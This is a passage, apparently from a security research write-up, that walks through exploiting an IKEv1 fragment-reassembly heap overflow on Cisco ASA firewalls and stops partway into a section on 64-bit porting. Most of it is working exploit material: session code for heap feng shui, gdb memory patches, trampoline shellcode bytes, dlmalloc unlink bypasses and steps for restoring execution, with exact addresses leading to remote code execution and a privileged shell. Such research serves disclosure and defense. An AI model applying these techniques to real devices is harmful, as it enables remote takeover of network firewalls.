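The clobbering can be reproduced with a toy doubly linked list: unlinking a neighbour on the same list rewrites our corrupted node's links before the corrupted node itself is ever processed.

```python
class Node:
    def __init__(self, name):
        self.name, self.fd, self.bk = name, None, None

def link_all(nodes):
    for i, node in enumerate(nodes):  # circular doubly linked list
        node.fd = nodes[(i + 1) % len(nodes)]
        node.bk = nodes[(i - 1) % len(nodes)]

def unlink(node):
    node.fd.bk = node.bk
    node.bk.fd = node.fd

a, b, c = Node("a"), Node("b"), Node("c")
link_all([a, b, c])
b.fd, b.bk = "fake_fd", "fake_bk"  # our crafted mirror-write targets
unlink(a)                          # a neighbour gets freed first...
assert b.bk is c                   # ...and one crafted link is gone
assert b.fd == "fake_fd"           # only the other one survived
```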

Crafting the heap with a deterministic layout scenario two: using different sessions

Next we use a feng shui approach using three sessions:

sess1 = ike_session(host, port)
sess2 = ike_session(host, port)
sess3 = ike_session(host, port)
seq = 1

print("Filling holes")
while seq < seq_count/2:
    sess1.send_fragment(seqno=seq, fragid=sess_id1, lastfrag=0, fragdata="A"*sz)
    seq += 1

print("Creating 2 adjacent chunks")
sess2.send_fragment(seqno=1, fragid=sess_id2, lastfrag=0, fragdata="B"*sz)
sess3.send_fragment(seqno=1, fragid=sess_id3, lastfrag=0, fragdata=fragdata)

print("Filling after 2 adjacent chunks")
while seq < seq_count:
    sess1.send_fragment(seqno=seq, fragid=sess_id1, lastfrag=0, fragdata="A"*sz)
    seq += 1

print("Creating one hole")
# reassemble hole session to force hole creation
sess2.send_fragment(seqno=2, fragid=sess_id2, lastfrag=1, fragdata="B"*sz)
return (sess3, sess_id3, sz)

This feng shui approach creates one hole adjacent to (before) one specific fragment, and that adjacent fragment comes from a session created solely for this single fragment (session 3). The idea is that we can free this specific fragment from session 3 at any time without any other fragments being freed in the process. This lets us avoid having our crafted mh_fd_link/mh_bk_link values overwritten with unwanted values.

# 0xa8c3c4d8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed   // session1
# 0xa8c3c6d8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session1
# 0xa8c3c8d8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session1
# 0xa8c3cad8 F sz:0x00200 fl:-P free_pc:0x42424242,- // session2
# 0xa8c3ccd8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session3
# 0xa8c3ced8 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session1

Now we can trigger reassembly to allocate a 0x1d0-byte chunk inside the 0x200-byte hole, leaving a 0x30-byte free chunk adjacent to (after) it. Using the same method as in scenario one, we modify the head member to make it look like a 0x90-byte free chunk. Then we free the single fragment from session 3 to trigger our mirror writes.

sess3.send_fragment(seqno=2, fragid=sess_id3, lastfrag=1, fragdata="C"*sz)

This time our allocated-list mirror write triggers first, causing the expected SIGSEGV before the free-list one we hit last time:

(gdb) x /i $pc
=> 0x9be7ab3: mov DWORD PTR [ecx+0x10],eax
(gdb) i r ecx
ecx 0xffff5254 -44460
(gdb) i r eax
eax 0xffff5250 -44464

We can then see if we achieved both mirror writes by choosing two writable addresses in memory and checking if we corrupted them after the chunk from session 3 is freed.

If we need several mirror writes, we can effectively generalise this method and create as many sessions with one fragment as we want, limited by the number of sessions we can create [5] and the predictability of a more complicated layout.

From mirror writes to remote code execution

On IKEv2, Exodus Intel targeted a global list_add() function pointer, which IKEv2 uses to add new fragments to the fragment queue. It is called as soon as a fragment is received, so they could achieve remote code execution (RCE) by sending one more fragment containing the final payload. However, there is no such equivalent in IKEv1, as a dedicated linked list is not used to hold fragment copies.

Looking for another interesting function pointer

We looked for a function pointer to overwrite by targeting IKEv1-related functions. The function intended to be called should be accessing some packet data we can control when sending an IKEv1 packet.

A good candidate we found is IKEMM_BuildMainModeMsg2. By setting a breakpoint on this function and sending a Security Association (SA) initialization packet (the first packet in an IKE session), we could see that at execution time the edx register holds a pointer to a pointer to our IKE packet. Arbitrary data we control in the packet (such as shellcode) is located at offset 0x6a from the beginning of the buffer (at 0xadc176da below). At the start of the buffer there are bytes we don't control (initialised to 0x0 below), followed by the size of the packet (0x0410) and then the beginning of the raw IKE packet (at 0xadc17682).

(gdb) i r edx
edx 0xacaa8334 -1398111436
(gdb) x /wx 0xacaa8334
0xacaa8334: 0xadc17670
(gdb) x /150bx 0xadc17670
0xadc17670: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xadc17678: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xadc17680: 0x04 0x10 0xeb 0x56 0x34 0x41 0x41 0x56
0xadc17688: 0x42 0x32 0x00 0x00 0x00 0x00 0x00 0x00
0xadc17690: 0x00 0x00 0x01 0x10 0x02 0x00 0x00 0x00
0xadc17698: 0x00 0x00 0x00 0x00 0x10 0x04 0x00 0x00
0xadc176a0: 0x00 0x38 0x00 0x00 0x00 0x01 0x00 0x00
0xadc176a8: 0x00 0x01 0x00 0x00 0x00 0x2c 0x01 0x01
0xadc176b0: 0x00 0x01 0x03 0x00 0x00 0x24 0x01 0x01
0xadc176b8: 0x00 0x00 0x80 0x01 0x00 0x05 0x80 0x02
0xadc176c0: 0x00 0x02 0x80 0x03 0x00 0x01 0x80 0x04
0xadc176c8: 0x00 0x02 0x80 0x0b 0x00 0x01 0x00 0x0c
0xadc176d0: 0x00 0x04 0x00 0x00 0x70 0x80 0x00 0x00
0xadc176d8: 0x0f 0xb0 0x90 0x90 0x90 0x90 0x90 0x90
0xadc176e0: 0x90 0x90 0x90 0x90 0xcc 0xcc 0xcc 0xcc
0xadc176e8: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc
0xadc176f0: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc
0xadc176f8: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc
0xadc17700: 0xcc 0xcc 0xcc 0xcc 0xcc 0xcc

The last thing we need to check is where and when IKEMM_BuildMainModeMsg2 gets executed, so we can find a corresponding function pointer to overwrite. There is indeed a global pointer (IKEMM_BuildMainModeMsg2_ptr) that references it, but it is in a read-only (.rodata) part of memory, so we can't overwrite it directly.

.rodata:09E7F240 IKEMM_BuildMainModeMsg2_ptr dd offset IKEMM_BuildMainModeMsg2

However, a pointer to the IKEMM_BuildMainModeMsg2_ptr function pointer is stored in a global table (IKEmmStateTable) that resides in a writable part of memory.

.data:0A46B680 IKEmmStateTable dd offset off_9E7F000 
.data:0A46B684 dd offset off_9E7F020
...
.data:0A46C330 dd offset IKEMM_BuildMainModeMsg2_ptr
...

There is a pointer (IKEmmTableInfo_ptr) to this global table (IKEmmStateTable).

.data:0A474F6C IKEmmTableInfo_ptr dd offset IKEmmStateTable

Looking at the backtrace when IKEMM_BuildMainModeMsg2() is called, we realised it is called by the instructions below. Basically, the code loads IKEmmTableInfo_ptr to find the global table IKEmmStateTable, indexes into the table at the slot holding IKEMM_BuildMainModeMsg2_ptr, and finally dereferences that entry to call the actual IKEMM_BuildMainModeMsg2 function.

.text:09BA5E60 FSM_SMDriver proc near
...
.text:09BA5FE9 loc_9BA5FE9:
.text:09BA5FE9 movzx edx, word ptr [esi+4]
.text:09BA5FED imul edx, [ebp+var_20]
.text:09BA5FF1 movzx eax, [ebp+var_38]
.text:09BA5FF5 mov ebx, [ebp+IKEmmTableInfo_ptr] ; IKEmmTableInfo_ptr
.text:09BA5FF8 add eax, edx ; e.g. eax = 8
.text:09BA5FFA mov edx, [ebx] ; edx = IKEmmStateTable
.text:09BA5FFC mov edx, [edx+eax*4]
.text:09BA5FFF  mov [ebp+func_ptr], edx ; e.g. IKEMM_BuildMainModeMsg2_ptr
.text:09BA6002 mov eax, [edx]
.text:09BA6004 test eax, eax
.text:09BA6006 jz short loc_9BA6065
.text:09BA6008 mov edx, [ebp+arg_14]
.text:09BA600B mov ecx, [ebp+arg_10]
.text:09BA600E mov ebx, [ebp+arg_C]
.text:09BA6011 mov [esp+8], edx
.text:09BA6015 mov [esp+4], ecx
.text:09BA6019 mov [esp], ebx
.text:09BA601C call eax ; IKEEnqueExtAction(), IKEMM_BuildMainModeMsg2(), etc.
.text:09BA601E mov edx, [ebp+func_ptr]
.text:09BA6021 mov edi, eax ; return value

In other words, if we replace any writable pointer in the chain, we can modify the control flow. It is easiest to modify the IKEMM_BuildMainModeMsg2_ptr entry in the table.
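To make the chain concrete, here is a small C model of the three-level dispatch. The names mirror the ASA symbols but the code itself is an illustrative sketch, not reversed code — it shows why patching the writable table entry is enough even though the real function pointer stays in .rodata:

```c
#include <assert.h>

typedef int (*state_fn)(void);

static int real_handler(void) { return 1; }   /* stands in for IKEMM_BuildMainModeMsg2 */
static int evil_handler(void) { return 42; }  /* stands in for our trampoline */

/* .rodata: the function pointer itself is not writable */
static const state_fn real_ptr = real_handler;        /* IKEMM_BuildMainModeMsg2_ptr */
static state_fn evil_ptr = evil_handler;              /* fake ptr, placed in RWX memory */

/* .data: both of these levels ARE writable */
static const state_fn *state_table[] = { &real_ptr }; /* IKEmmStateTable */
static const state_fn **table_info = state_table;     /* IKEmmTableInfo_ptr */

/* FSM_SMDriver-style dispatch: ptr -> table -> entry -> function */
static int dispatch(int idx)
{
    const state_fn *entry = table_info[idx];  /* mov edx, [edx+eax*4] */
    return (*entry)();                        /* mov eax, [edx] / call eax */
}
```

Overwriting `state_table[0]` with a pointer to our own function pointer redirects the call without ever touching the read-only `real_ptr`.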

Jumping onto our packet

From this moment, we know we can get RCE on systems without ASLR and NX (which is plenty, as noted in our firmware-related blog post) since we have everything we need:

  • We can use a mirror write to overwrite IKEMM_BuildMainModeMsg2_ptr to point to some controlled code.
  • This controlled code needs to be a trampoline that redirects execution to our packet data.
  • We can trigger as many mirror writes as we need to build a trampoline somewhere in memory.
  • The trampoline should de-reference edx, add 0x6a to the value and jump to it.

After a few failed tests using three mirror writes, we ended up using four mirror writes. The layout requires one free chunk followed by three adjacent allocated chunks that will be overlaid upon re-allocation of the encompassing free chunk to facilitate corruption.

For debugging we don't really need to trigger the exploit each time. Instead we can directly patch memory in gdb to simulate that we patched the function pointer and installed our trampoline, as if we used the mirror writes. Then we can send an SA init packet with shellcode and check that we get our shellcode executed.

The four patches are the following:

(gdb) set *(int*)0x0a46c330 = 0xc2831200  (1)
(gdb) set *(int*)0xc2831200 = 0xc2831204 (2)
(gdb) set *(int*)0xc2831204 = 0xc283128b (3)
(gdb) set *(int*)0xc2831208 = 0xc2e2ff6a (4)

Patch (1) is used to patch the pointer to function pointer:

.data:0A46C330  dd offset IKEMM_BuildMainModeMsg2_ptr

into:

.data:0A46C330  dd offset IKEMM_BuildMainModeMsg2_fake_ptr

We make it point to a part of memory which is RWX, because read/write access is needed during unlinking and execute access is required for the trampoline we store and run there. We choose addresses within 0xc2000000-0xc2ffffff and confirm with our debug shell that this range is mapped RWX. It is unused (filled with 0x0, as we can check with gdb):

# ps|grep lina
517 root /asa/bin/lina -p 512 -t -g -l
# cat /proc/517/maps
a6000000-a8724000 rwxs 00000000 00:0e 1740 /dev/udma0
a8800000-ab400000 rwxs 00000000 00:0b 0 /SYSV00000002 (deleted)
ab800000-abc00000 rwxs 03000000 00:0b 0 /SYSV00000002 (deleted)
ac400000-dbc00000 rwxs 03c00000 00:0b 0 /SYSV00000002 (deleted)

There is a chance that under very heavy memory load this memory could be in use for something, but it generally corresponds to part of the dlmalloc wilderness and is therefore safe to use.

Patch (2) is used to create a fake function pointer. We basically craft something similar to the following, but place it somewhere else in memory.

.rodata:09E7F240 IKEMM_BuildMainModeMsg2_ptr dd offset IKEMM_BuildMainModeMsg2

We effectively get the following:

.rwx:c2831200 IKEMM_BuildMainModeMsg2_fake_ptr  dd offset Trampoline_address

Now, we can build our trampoline at 0xc2831204. We use two writes as we need to write eight bytes. The following was used:

; edx is a pointer to our packet
#0: 8b 12 mov edx,DWORD PTR [edx] ; access our packet
#2: 83 c2 6a add edx,0x6a ; points to our shellcode within packet
#5: ff e2 jmp edx ; jump to it
#7: c2 .byte 0xc2
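As a sanity check, patches (3) and (4) store these eight bytes as two little-endian dwords. A quick sketch verifying the decomposition — illustrative only, and it assumes a little-endian host like the x86 target:

```c
#include <stdint.h>
#include <string.h>

int check_trampoline(void)
{
    /* the two dwords written at 0xc2831204 and 0xc2831208 */
    uint32_t patch3 = 0xc283128b;
    uint32_t patch4 = 0xc2e2ff6a;

    /* mov edx,[edx] ; add edx,0x6a ; jmp edx ; trailing 0xc2 pad byte */
    uint8_t expected[8] = { 0x8b, 0x12, 0x83, 0xc2,
                            0x6a, 0xff, 0xe2, 0xc2 };

    uint8_t buf[8];
    memcpy(buf, &patch3, 4);      /* little-endian store, as on the x86 target */
    memcpy(buf + 4, &patch4, 4);
    return memcmp(buf, expected, 8) == 0;
}
```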

Restoring execution

Once our payload is running, we need to fix up what we did. First, we restore the overwritten pointer to function pointer so future SA initialization packets will function correctly.

// IKEmmStateTable[index] = IKEMM_BuildMainModeMsg2_ptr
mov ebx, 0x09E7F240 # IKEMM_BuildMainModeMsg2_ptr
mov eax, 0x0A46C330 # offset for IKEMM_BuildMainModeMsg2_ptr in IKEmmStateTable
mov [eax], ebx

We want to call the original function to make sure it does not crash.

mov eax, 0x086AE1B0    # IKEMM_BuildMainModeMsg2
jmp eax

After doing that, we realise that IKEMM_BuildMainModeMsg2 is called, returns, and then a crash occurs. Looking at the code after the function returns, we see that the func_ptr is reused:

.text:09BA601C            call   eax ; IKEEnqueExtAction(), IKEMM_BuildMainModeMsg2(), etc.
.text:09BA601E mov edx, [ebp+func_ptr]
.text:09BA6021 mov edi, eax ; return value

It corresponds to the IKEMM_BuildMainModeMsg2_ptr entry that we corrupted, so the value is no longer valid.

.text:09BA5FFF            mov    [ebp+func_ptr], edx ; e.g. IKEMM_BuildMainModeMsg2_ptr

We can simply fix it as well before calling IKEMM_BuildMainModeMsg2:

// *(ebp+func_ptr) = IKEMM_BuildMainModeMsg2_ptr
mov eax, ebp
sub eax, 0x24
mov ebx, 0x09E7F240 # IKEMM_BuildMainModeMsg2_ptr
mov [eax], ebx

Restoring the heap layout

The next step is to make sure to fix the heap chunks that were corrupted. We detail the important bits here. Let’s summarise the different steps of our exploit to understand what needs to be fixed.

When the reassembled buffer is allocated, we have the following layout:

0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96a08 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53   //reassembled packet
0xacb96bd8 F sz:0x00030 fl:-P free_pc:0x00000000,-
0xacb96c08 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96e08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97008 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

After the initial memory corruption we have:

0xacb96a08 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53   //reassembled packet
0xacb96bd8 F sz:0x00490 fl:-P free_pc:0x00000000,-                     //chunk with corrupted size
0xacb97068 M sz:0x001a0 fl:C- alloc_pc:0x45454545,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

After the reassembled packet is freed, we have the following (the 0x1d0-byte chunk coalesces with the 0x490-byte chunk):

(gdb) dlchunk 0xacb96a08-0x200 -c 4
0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96a08 F sz:0x00660 fl:-P free_pc:0x0865878c,ikev1_parse_packet+0x33c //encompasses 0xacb96c08..
0xacb97068 M sz:0x001a0 fl:C- alloc_pc:0x45454545,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

Next we reallocated the 0x660-byte chunk to corrupt the mempool header links for the three adjacent allocated chunks and crafted a fake 0x30-byte free chunk before that.

However, the layout can be interpreted from two points of view. The first one is from the reallocated 0x660 chunk.

(gdb) dlchunk 0xacb96a08 -c 5
0xacb96a08 M sz:0x00660 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97068 M sz:0x001a0 fl:CP alloc_pc:0x45454545,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

The second one is from the chunks after 0xacb96c08 where we see a 0x30 free chunk before.

(gdb) dlchunk 0xacb96bd8 -c 4
0xacb96bd8 F sz:0x00030 fl:-P free_pc:0x00000000,-
0xacb96c08 M sz:0x00200 fl:C- alloc_pc:0x00004443,-
0xacb96e08 M sz:0x00200 fl:CP alloc_pc:0x00004443,-
0xacb97008 M sz:0x00200 fl:CP alloc_pc:0x00004443,-

After all the 0x200-byte chunks are freed, the mirror writes happen and our shellcode executes. We continue execution and no crash occurs. This is because Checkheaps is disabled, so it does not see the corrupted heap chunks that we haven't fixed yet.

This allows us to understand how to fix the heap. As can be seen below, all previously adjacent chunks are still allocated because the IKE sessions for these chunks are left open. That said, the chunk after the 0x660-byte chunk is not valid because the 0x660-byte chunk encompasses a very large adjacent chunk. If Checkheaps had been enabled, it would have detected this invalid chunk.

(gdb) dlchunk 0xacb96008 -c 10
0xacb96008 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb96a08 M sz:0x00660 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
[!] Chunk at address 0xacb97068 likely invalid or corrupt
0xacb97068 F sz:0x00000 fl:--
<<< end of heap segment >>>

The very large chunk starts at 0xacb96bd8 and has since been reallocated, as shown below. It corresponds to our previous 0x30-byte free chunk coalesced with the three following allocated chunks (0x5f8 + 0x38 = 0x630 = 0x30 + 0x200 + 0x200 + 0x200).

(gdb) dlchunk 0xacb96bd8 -c 10
0xacb96bd8 M sz:0x005f8 fl:CP alloc_pc:0x086a12ea,isadb_create_entry+0x4a
0xacb971d0 M sz:0x00038 fl:CP alloc_pc:0x086c794e,oakley_atts_to_sa+0x51e
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97a08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97c08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb97e08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xacb98008 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

The only thing we need to do is fix the chunk at 0xacb96a08. More precisely, we need to fix its dlmalloc-2.8.x head and mempool header mh_len fields to reflect a size that makes everything line up again.

(gdb) set *(int*)(0xacb96a08+4) = 0x000001d3
(gdb) set *(int*)(0xacb96a08+0xC) = 0x000001a4
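The new head value 0x1d3 follows the dlmalloc-2.8.x encoding, where the two low bits of head are the CINUSE/PINUSE flags (mh_len is simply set to the matching mempool length). A small illustrative helper, not actual dlmalloc code:

```c
#include <stdint.h>

/* dlmalloc-2.8.x stores the inuse bits in the low bits of head */
#define PINUSE_BIT  ((uint32_t)1)  /* previous chunk in use */
#define CINUSE_BIT  ((uint32_t)2)  /* current chunk in use */

static uint32_t make_head(uint32_t size, int cinuse, int pinuse)
{
    uint32_t head = size;
    if (cinuse) head |= CINUSE_BIT;
    if (pinuse) head |= PINUSE_BIT;
    return head;
}
```

The same encoding explains the earlier fake free chunk: an in-use 0x1d0-byte chunk gets head 0x1d3, while a free 0x90-byte chunk whose predecessor is in use gets head 0x91.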

We can check that it now aligns:

(gdb) dlchunk 0xacb96a08-0x200 -c 10
0xacb96808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb96a08 M sz:0x001d0 fl:CP alloc_pc:0x086887bd,-
0xacb96bd8 M sz:0x005f8 fl:CP alloc_pc:0x086a12ea,-
0xacb971d0 M sz:0x00038 fl:CP alloc_pc:0x086c794e,-
0xacb97208 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97408 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97608 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97808 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97a08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-
0xacb97c08 M sz:0x00200 fl:CP alloc_pc:0x086887bd,-

In our experiment, we clear all sessions to free all packets.

asa(config)# clear crypto ikev1 sa

We see all our buffers were freed (between 0xacb96008 and 0xacb98408) and it did not trigger any crash.

(gdb) dlchunk 0xacb96808-0x800 -c 10
0xacb96008 F sz:0x02400 fl:-P free_pc:0x0868161d,-
0xacb98408 M sz:0x01030 fl:C- alloc_pc:0x09306bc3,-
0xacb99438 M sz:0x00830 fl:CP alloc_pc:0x09306b5e,-
0xacb99c68 M sz:0x00230 fl:CP alloc_pc:0x091658b9,-
0xacb99e98 M sz:0x00118 fl:CP alloc_pc:0x0825e016,-
0xacb99fb0 F sz:0x00028 fl:-P free_pc:0xf3eecdef,-
0xacb99fd8 M sz:0x00080 fl:C- alloc_pc:0x090f3ea0,-
0xacb9a058 M sz:0x04030 fl:CP alloc_pc:0x0806b8b1,-
0xacb9e088 M sz:0x04030 fl:CP alloc_pc:0x0806b8b1,-
0xacba20b8 M sz:0x04030 fl:CP alloc_pc:0x0806b8b1,-

We don't get any crash after re-enabling Checkheaps in gdb. Now we can add a reverse CLI to access the Cisco shell with all privileges.

What has been described so far can be extended to disable Checkheaps on the fly, or adjusted to avoid Checkheaps detection, but for the sake of simplifying the explanation we don't go into those details.

Interesting tricks

We detail a few interesting tricks we used when developing the IKEv1 exploit.

Avoiding ok_address() during coalescence in dlmalloc-2.8.x

This is something Exodus had to use for the IKEv2 exploit, but it hadn't been explicitly explained.

We assume a layout like the one shown below. G is a free chunk and each A is an allocated chunk we control.

| big buff overlapping A1-A3 | fake G | A1 | A2 | A3 |

When we free A1, it coalesces backwards into G. This results in two unlinks: one using mh_fd_link and mh_bk_link, and a second using fd/bk, because A1 coalesces backwards into the fake G (which is part of big buff).

When unlinking G for the backward coalescence, dlmalloc ends up calling unlink_small_chunk() (e.g. for a 0x30-byte G chunk), which we previously detailed. The important part here is that because dlmalloc-2.8.x, as compiled on Cisco devices, uses the RTCHECK() asserts, it ends up running:

/* Unlink a chunk from a smallbin */
#define unlink_small_chunk(M, P, S) {
  mchunkptr F = P->fd;
  mchunkptr B = P->bk;
  //...
  else if (RTCHECK((F == smallbin_at(M,I) || ok_address(M, F)) &&
                   (B == smallbin_at(M,I) || ok_address(M, B)))) {

We have to safely avoid ok_address(), which is:

#define ok_address(M, a) ((char*)(a) >= (M)->least_addr)

In this case mstate->least_addr points to the heap base, which on 32-bit without ASLR is typically 0xa8400008 or 0xa8800008, so we can't, for instance, mirror write into destinations located in lina's .data section. This is important because for the exploits we end up having to write at least one pointer into .data, which you'd normally want as the last write because it is what inevitably redirects code execution. However, we just need to do that write in one of the unlinks that operates on the mempool headers instead, since they don't use the same checks. We can do it in the last mempool header unlink for A1, before the coalescence with the previous G chunk.
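Plugging our addresses into the check makes the constraint obvious — a small sketch using the least_addr value from our 32-bit no-ASLR target:

```c
#include <stdint.h>

/* dlmalloc-2.8.x: an address passes ok_address() only if it is
 * not below the lowest address the allocator has ever managed */
static int ok_addr(uintptr_t least_addr, uintptr_t a)
{
    return a >= least_addr;
}
```

lina's .data (around 0x0a46c330) sits far below 0xa8400008, so the dlmalloc fd/bk unlink rejects it, while the RWX scratch region at 0xc2831200 passes; hence the .data write must go through a mempool header unlink instead.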

Tricking unlink_large_chunk() when faking a large overlap chunk

When we trigger exploitation on IKEv1, we end up corrupting an adjacent free chunk G (the same way Exodus Intel did it) in order to overlay a bunch of other in-use chunks we want to corrupt. To do this we corrupt a 0x30-byte small chunk into a 0x660-byte large chunk. This causes one notable problem, insofar as the free chunk header for a small chunk is different from that of a large chunk (used for chunks above 0x100 bytes).

Note that this section briefly duplicates some information we presented in our dlmalloc blog post, so those who have read it can skip the rest of this section if they like.

A large chunk looks like this:

struct malloc_tree_chunk {
  /* The first four fields must be compatible with malloc_chunk */
  size_t prev_foot;
  size_t head;
  struct malloc_tree_chunk* fd;
  struct malloc_tree_chunk* bk;

  struct malloc_tree_chunk* child[2];
  struct malloc_tree_chunk* parent;
  bindex_t index;
};

Whereas a small chunk looks like this:

struct malloc_chunk {
  size_t prev_foot;        /* Size of previous chunk (if free). */
  size_t head;             /* Size and inuse bits. */
  struct malloc_chunk* fd; /* double links -- used only if free. */
  struct malloc_chunk* bk;
};

The problem here is that when unlinking this modified G chunk with a larger size, the heap will now call unlink_large_chunk() during coalescence, instead of unlink_small_chunk(), which ends up acting on what it thinks is a malloc_tree_chunk.

The important thing though is that in the layout below:

| Reassembly | G |

We explicitly created the 0x30-byte free chunk G when we did the feng shui. Because it is part of a hole re-used for the reassembly, we control the contents of the free chunk. This means we can prime some of the data in it that will be used later when it is processed as a malloc_tree_chunk.

The main thing required is to set the parent to NULL. When unlink_large_chunk() is called it will do the following:

#define unlink_large_chunk(M, X) {
  tchunkptr XP = X->parent;
  tchunkptr R;
  if (X->bk != X) {
    tchunkptr F = X->fd;
    R = X->bk;
    if (RTCHECK(ok_address(M, F))) {
      F->bk = R;
      R->fd = F;
    }
    else {
      CORRUPTION_ERROR_ACTION(M);
    }
  }
  else {
    [...]
  }

Above, it unlinks the chunk from the typical doubly linked list. Next, as shown below, it tests whether the parent is NULL (the if (XP != 0) test). If the parent is not NULL, you can see it performs a bunch of additional actions, including manipulating the child nodes. However, if parent is NULL, this whole portion of the unlink operation is skipped and we don't have to worry about it.

  if (XP != 0) {
    tbinptr* H = treebin_at(M, X->index);
    if (X == *H) {
      if ((*H = R) == 0)
        clear_treemap(M, X->index);
    }
    else if (RTCHECK(ok_address(M, XP))) {
      if (XP->child[0] == X)
        XP->child[0] = R;
      else
        XP->child[1] = R;
    }
    else
      CORRUPTION_ERROR_ACTION(M);
    if (R != 0) {
      if (RTCHECK(ok_address(M, R))) {
        tchunkptr C0, C1;
        R->parent = XP;
        if ((C0 = X->child[0]) != 0) {
          if (RTCHECK(ok_address(M, C0))) {
            R->child[0] = C0;
            C0->parent = R;
          }
          else
            CORRUPTION_ERROR_ACTION(M);
        }
        if ((C1 = X->child[1]) != 0) {
          if (RTCHECK(ok_address(M, C1))) {
            R->child[1] = C1;
            C1->parent = R;
          }
          else
            CORRUPTION_ERROR_ACTION(M);
        }
      }
      else
        CORRUPTION_ERROR_ACTION(M);
    }
  }
}
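The effect of priming parent can be modelled with a reduced version of the unlink — an illustrative sketch, not the real dlmalloc code:

```c
#include <stddef.h>

typedef struct tchunk {
    struct tchunk *fd, *bk;      /* list links within one tree node */
    struct tchunk *child[2];
    struct tchunk *parent;
} tchunk;

/* Reduced unlink_large_chunk(): if the node has list siblings
 * (bk != self), the fd/bk unlink runs; the tree-surgery branch
 * only runs when parent (XP) is non-NULL. */
static int unlink_large(tchunk *x)
{
    int tree_surgery = 0;
    if (x->bk != x) {
        x->fd->bk = x->bk;       /* the unlink writes we rely on */
        x->bk->fd = x->fd;
    }
    if (x->parent != NULL) {
        tree_surgery = 1;        /* would touch child[] / parent here */
    }
    return tree_surgery;
}
```

With parent primed to NULL, only the list unlink (and its writes) happens, and none of the child/parent pointers are ever dereferenced.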

Porting to 64-bit

Still avoiding ok_address()

We discussed this hurdle for 32-bit already, but on 64-bit (asa924-smp-k8.bin) we have mstate->least_addr = 0x7fff99485000, which means we also can't use addresses in a large portion of otherwise available RWX memory. For example, the DMA mempool, mapped via /dev/udma0, becomes unusable for mirror writes, which would otherwise have been quite useful:

7fff90a00000-7fff99397000 rwxs 00000000 00:0f 2135     /dev/udma0

We chose instead to use the .bss section at the end of libcgroup.so to build our trampoline, since in our example above we relied on one free unlink.

7ffffe25d000-7ffffe8bb000 rwxp [.bss] /usr/lib64/libcgroup.so.1.0.34

Another approach is to use only the mempool allocated-list pointers for all mirror writes, rather than crafting a fake small free chunk for the additional unlink. This would also have the advantage of working on newer 64-bit devices based on ptmalloc with safe unlinking.

Still tricking unlink_large_chunk()

When using the following layout:

malloc: 0x7fff99b6b140, realsz 0x01d0, reqsz 0x018c - reassembled packet
0x7fff99b6b140 M sz:0x001d0 fl:CP alloc_pc:0x00a06235,-
0x7fff99b6b310 F sz:0x00030 fl:-P free_pc:0x1bca11c0123,-
0x7fff99b6b340 M sz:0x00200 fl:C- alloc_pc:0x00a0cc50,-
